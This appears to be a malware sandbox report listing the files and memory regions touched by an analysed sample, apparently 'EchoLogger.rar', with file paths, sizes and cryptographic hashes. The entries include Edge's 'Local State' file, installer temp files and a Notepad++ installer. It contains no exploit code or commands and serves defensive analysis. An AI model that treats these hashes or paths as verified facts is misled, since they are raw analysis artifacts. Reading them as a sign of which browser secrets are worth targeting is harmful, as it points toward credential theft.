8d017417be7d4f229837cbf672671453a92f1b68fc5c2f108ce6b2925750dad6e0e6f1d3586d7c3d587d0a17936fb74f81dc0744535502ae707ab6864f7ed501

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
494df37a24b8d1875dcf04ecf52daee6

SHA1
65d0f02581d162a54a2cc831998b65f5405594ed

SHA256
e07f7a80f2fc129ab5f5c355c2e3ff46845550e88e6e9866ad11d72c1af4de60

SHA512
410c1a98c6b3d60b37a88a14ec8bd691ebba1426dea616022b8c72bfaca8166327a9b0c328aab6fa3661971e521315d79323e1d1102c696c40c1cb3cb16bd1b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
3640a73bd131b09ebd28bc8634b8b094

SHA1
cdc5af060785c8b7348cdb185e57e90da3338872

SHA256
52938e62b197bb11546878f6ca910f255206fb167c975c9d71cd7279453cf3bf

SHA512
ab8d5a877768bb060f59deb1e382e683f5a1a13d69cd0fcc02e09241e589177103845780bce659df4b19609feb8ae4e8d05a674068df1b1edf50f07384027c10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
e2025940774d3b4f4193c2ca5714e5b2

SHA1
ea272d0f18e371f098f96f8518f42a611d663646

SHA256
cef1feba4cc6b77e45da2cefab09f3ae1e06f89e358675017b73ea2a98059cab

SHA512
c24aaf1efaa46d508132301b08426263aee83117cd31d5e61423cb356cc43219fb6710263c94e7a9f460bf236f1f5632b4c23100b9e012f9fd4657b6c6b89bf9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\TFGUZFAM\microsoft.windows[1].xml

Filesize
97B

MD5
23e75588c4b47ba78cb8a8eed56e929c

SHA1
604ebe095d72e8db462f819030cad3b0c3ab5387

SHA256
0ce9d69d25a6ebd20d21ec6375153799f184edd8f9f52c51c719fcbe8377cfa0

SHA512
9a9b376613160d318c296d1176b2ed117248a8dfdee9d1bf8b2389c66cc2d848f06f2a8b920b6f9a0e8ee851507b4e4cfb4331c31cbf9b54cf968378b0bd1bdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mkmpzo0.tmi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz2B0C.tmp\InstallOptions.dll

Filesize
15KB

MD5
ece25721125d55aa26cdfe019c871476

SHA1
b87685ae482553823bf95e73e790de48dc0c11ba

SHA256
c7fef6457989d97fecc0616a69947927da9d8c493f7905dc8475c748f044f3cf

SHA512
4e384735d03c943f5eb3396bb3a9cb42c9d8a5479fe2871de5b8bc18db4bbd6e2c5f8fd71b6840512a7249e12a1c63e0e760417e4baa3dc30f51375588410480

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz2B0C.tmp\ioSpecial.ini

Filesize
1KB

MD5
0f71a00d2a1bb051bdc2744a43afa4c6

SHA1
bd7ba29644542f47d06541be8bd91e9c854e5885

SHA256
190db4bf53b53e7bb74d30d17fdb7ed47dd32b522fe38eb1a7856d16b616c8ee

SHA512
9fa4a24ee436fb02a177ede1b1428b09f2d5dc664f6113053ec02b70b31d200853cfa05b9ed6fc8f82aee000f01a9a7aeec79f8847fce333c72a05b6ed296d66

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz2B0C.tmp\ioSpecial.ini

Filesize
1KB

MD5
20827f94fbf013ae2fc6ab7e5e69d102

SHA1
2a781ec5bb5326996890da882445fa0de4b474d3

SHA256
da5a0fcc6047440856c739f96c34b8b001a9565a410767c634d729570f46a5b2

SHA512
bbfadabff7dcb54a89e6826a3b494be09cfa07846f2abad8ac791685328bec90e97871cc245baf0e4053f893ccea802c0249fb2192b14c637b575139aa282795

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsz2B0C.tmp\ioSpecial.ini

Filesize
1KB

MD5
dc990760fc4fd6a956eb83d465e1141a

SHA1
404cda4d76ed306bbdb28dcab9c2a849e3c04e05

SHA256
0e9942381177c8b91663c852819e38c4c222ea0f78314b4702221b3b6605f577

SHA512
afd805f74e254cc5b23de18d83a74b1a44453fe75df3f2e3ed569703e174cd613ee0982f861d16caf993167eb92ae264cd8dc8c8efee34f6e5bb336097113eff

Download Submit
C:\Users\Admin\AppData\Roaming\Notepad++\plugins\config\converter.ini

Filesize
644B

MD5
f70f579156c93b097e656caba577a5c9

SHA1
8abfdad2ac85b7433318952b7a7e385a8c18674c

SHA256
b926498a19ca95dc28964b7336e5847107dd3c0f52c85195c135d9dd6ca402d4

SHA512
1e79b8e6df1ac158317d4670a01d5fb811470ace0f1f0f547ae979b3eff9bfee65770ad8134a6bddf2e871dc8fa553e146c7d7d94d2c3e139ae4b4942562b5fe

Download Submit
C:\Users\Admin\Downloads\EchoLogger.rar

Filesize
3.6MB

MD5
09c086c5472393ef1e79617d60483d9e

SHA1
d5346467d634fbb1440447637f461144f6b1236f

SHA256
76deab1a58bf0794d542b99fef5efb8ca09ba08647b860cf535d200a86f3f34f

SHA512
02dbb890bb1bbc542404971b9df4b2b739ef1c58094fb6cddb0c72980defbda7cdc9a304a3f0dd2b9c34dace6c7f6928e3d70500506bb39ac77c82eb4b2d11c6

Download Submit
C:\Users\Admin\Downloads\Yeni_Metin_Belgesi.txt

Filesize
55B

MD5
30e8bb2d1319df7f97c6a359a81d5a6c

SHA1
ed8ff2f85c3fa78e0f68ad0becdf32712c62cc49

SHA256
da44da566b4f7bd00f5682f7d11f1a91c7f684a3267b33070f87cc41bec96611

SHA512
a73a3b0d7cd5f6a28fcc3c167412aa127bc40393ba01592d660f20da4593c3de63b86b520511217585bca457fc4d7767c51f3b41dae75eb03ba00f6cd7e5c786

Download Submit
C:\Users\Admin\Downloads\Yeni_Metin_Belgesi.txt

Filesize
55B

MD5
30e8bb2d1319df7f97c6a359a81d5a6c

SHA1
ed8ff2f85c3fa78e0f68ad0becdf32712c62cc49

SHA256
da44da566b4f7bd00f5682f7d11f1a91c7f684a3267b33070f87cc41bec96611

SHA512
a73a3b0d7cd5f6a28fcc3c167412aa127bc40393ba01592d660f20da4593c3de63b86b520511217585bca457fc4d7767c51f3b41dae75eb03ba00f6cd7e5c786

Download Submit
C:\Users\Admin\Downloads\npp.8.5.Installer.x64.exe

Filesize
4.4MB

MD5
c2dc94b22c628af48ce478dc182016a9

SHA1
0a129db9a19b021b4a83cf267ebb2eb8c3b8241b

SHA256
2591bf0259e5aa4f5278ceef7a0c9648bafced886ee28a75434a0d38c86627ee

SHA512
0923854674f959e92bba82f55b761b60e461c2edc6fbdad4eb4be6b16aa4b7f2daa92c9a6273f0f27d35ba7f2507a824a9bafad1109ceac56ed7232d113b1c98

Download Submit
memory/1784-2407-0x0000024FE7430000-0x0000024FE7440000-memory.dmp

Filesize
64KB

Download
memory/1784-2405-0x0000024FE7430000-0x0000024FE7440000-memory.dmp

Filesize
64KB

Download
memory/1784-2843-0x0000024FE7430000-0x0000024FE7440000-memory.dmp

Filesize
64KB

Download
memory/2020-2216-0x0000027045C00000-0x0000027045C10000-memory.dmp

Filesize
64KB

Download
memory/2020-2210-0x0000027045C00000-0x0000027045C10000-memory.dmp

Filesize
64KB

Download
memory/2020-2212-0x0000027045C00000-0x0000027045C10000-memory.dmp

Filesize
64KB

Download
memory/2020-2211-0x0000027045C00000-0x0000027045C10000-memory.dmp

Filesize
64KB

Download
memory/2204-3256-0x00007FF4072B0000-0x00007FF4072C0000-memory.dmp

Filesize
64KB

Download
memory/2204-3254-0x0000022DEB4B0000-0x0000022DEB4C0000-memory.dmp

Filesize
64KB

Download
memory/2204-3276-0x0000022DEB4B9000-0x0000022DEB4BF000-memory.dmp

Filesize
24KB

Download
memory/2204-3255-0x0000022DEB4B0000-0x0000022DEB4C0000-memory.dmp

Filesize
64KB

Download
memory/2204-3253-0x0000022DEB4B0000-0x0000022DEB4C0000-memory.dmp

Filesize
64KB

Download
memory/2340-1968-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/2340-2008-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/2340-1761-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/2492-3558-0x0000021948C60000-0x0000021948C70000-memory.dmp

Filesize
64KB

Download
memory/2492-3559-0x0000021948C60000-0x0000021948C70000-memory.dmp

Filesize
64KB

Download
memory/2656-2190-0x0000029E43F00000-0x0000029E43F10000-memory.dmp

Filesize
64KB

Download
memory/2656-2189-0x0000029E43F00000-0x0000029E43F10000-memory.dmp

Filesize
64KB

Download
memory/2656-2188-0x0000029E43F00000-0x0000029E43F10000-memory.dmp

Filesize
64KB

Download
memory/2672-2004-0x0000023642AE0000-0x0000023642AF0000-memory.dmp

Filesize
64KB

Download
memory/2672-2003-0x0000023642AE0000-0x0000023642AF0000-memory.dmp

Filesize
64KB

Download
memory/3716-3225-0x00000183C26B0000-0x00000183C26CA000-memory.dmp

Filesize
104KB

Download
memory/3716-3222-0x00007FF4C1F50000-0x00007FF4C1F60000-memory.dmp

Filesize
64KB

Download
memory/3716-3207-0x00000183A99D0000-0x00000183A99E0000-memory.dmp

Filesize
64KB

Download
memory/3716-3206-0x00000183A99D0000-0x00000183A99E0000-memory.dmp

Filesize
64KB

Download
memory/3716-3220-0x00000183C2430000-0x00000183C244C000-memory.dmp

Filesize
112KB

Download
memory/3716-3228-0x00000183C26A0000-0x00000183C26AA000-memory.dmp

Filesize
40KB

Download
memory/3716-3227-0x00000183C2690000-0x00000183C2696000-memory.dmp

Filesize
24KB

Download
memory/3716-3226-0x00000183C2660000-0x00000183C2668000-memory.dmp

Filesize
32KB

Download
memory/3716-3224-0x00000183C2650000-0x00000183C265A000-memory.dmp

Filesize
40KB

Download
memory/3716-3223-0x00000183C2670000-0x00000183C268C000-memory.dmp

Filesize
112KB

Download
memory/3716-3221-0x00000183C2420000-0x00000183C242A000-memory.dmp

Filesize
40KB

Download
memory/3828-386-0x000001D07B6A0000-0x000001D07B70F000-memory.dmp

Filesize
444KB

Download
memory/4564-2389-0x000002357A760000-0x000002357A770000-memory.dmp

Filesize
64KB

Download
memory/4564-2392-0x000002357A760000-0x000002357A770000-memory.dmp

Filesize
64KB

Download
memory/4564-2388-0x000002357A760000-0x000002357A770000-memory.dmp

Filesize
64KB

Download
memory/4616-3282-0x00000164408F0000-0x0000016440910000-memory.dmp

Filesize
128KB

Download
memory/4616-3300-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3454-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-5961-0x00000164D3420000-0x00000164D3440000-memory.dmp

Filesize
128KB

Download
memory/4616-5960-0x00000164D3200000-0x00000164D3220000-memory.dmp

Filesize
128KB

Download
memory/4616-5955-0x00000164D3420000-0x00000164D3440000-memory.dmp

Filesize
128KB

Download
memory/4616-3284-0x00000164C2DC0000-0x00000164C2E00000-memory.dmp

Filesize
256KB

Download
memory/4616-5954-0x00000164D3200000-0x00000164D3220000-memory.dmp

Filesize
128KB

Download
memory/4616-3299-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3348-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3430-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3283-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3415-0x00000164D3200000-0x00000164D3220000-memory.dmp

Filesize
128KB

Download
memory/4616-3409-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3407-0x00000164D3200000-0x00000164D3220000-memory.dmp

Filesize
128KB

Download
memory/4616-3397-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4616-3380-0x00007FF7904F0000-0x00007FF790CE4000-memory.dmp

Filesize
8.0MB

Download
memory/4692-2187-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/4692-1890-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/4692-2233-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/4996-1989-0x0000025B25CD0000-0x0000025B25CE0000-memory.dmp

Filesize
64KB

Download
memory/4996-1988-0x0000025B25CD0000-0x0000025B25CE0000-memory.dmp

Filesize
64KB

Download
memory/4996-1987-0x0000025B25CD0000-0x0000025B25CE0000-memory.dmp

Filesize
64KB

Download
memory/4996-1973-0x0000025B3FB40000-0x0000025B3FB62000-memory.dmp

Filesize
136KB

Download
memory/5040-3527-0x00000241622E0000-0x00000241622F0000-memory.dmp

Filesize
64KB

Download
memory/5040-3526-0x00000241622E0000-0x00000241622F0000-memory.dmp

Filesize
64KB

Download
memory/5108-2168-0x00007FF7B3D50000-0x00007FF7B4146000-memory.dmp

Filesize
4.0MB

Download
memory/5108-3205-0x00007FF7B3D50000-0x00007FF7B4146000-memory.dmp

Filesize
4.0MB

Download
memory/5108-3281-0x00007FF7B3D50000-0x00007FF7B4146000-memory.dmp

Filesize
4.0MB

Download
memory/5288-2254-0x000002306C320000-0x000002306C330000-memory.dmp

Filesize
64KB

Download
memory/5288-2253-0x000002306C320000-0x000002306C330000-memory.dmp

Filesize
64KB

Download
memory/5288-2250-0x000002306C320000-0x000002306C330000-memory.dmp

Filesize
64KB

Download
memory/5312-2363-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/5312-1894-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/5312-2394-0x00007FF6D1280000-0x00007FF6D1676000-memory.dmp

Filesize
4.0MB

Download
memory/5372-3524-0x000001A330230000-0x000001A330240000-memory.dmp

Filesize
64KB

Download
memory/5372-3521-0x000001A330230000-0x000001A330240000-memory.dmp

Filesize
64KB

Download
memory/5372-3520-0x000001A330230000-0x000001A330240000-memory.dmp

Filesize
64KB

Download
memory/5860-3298-0x00007FF61B530000-0x00007FF61B546000-memory.dmp

Filesize
88KB

Download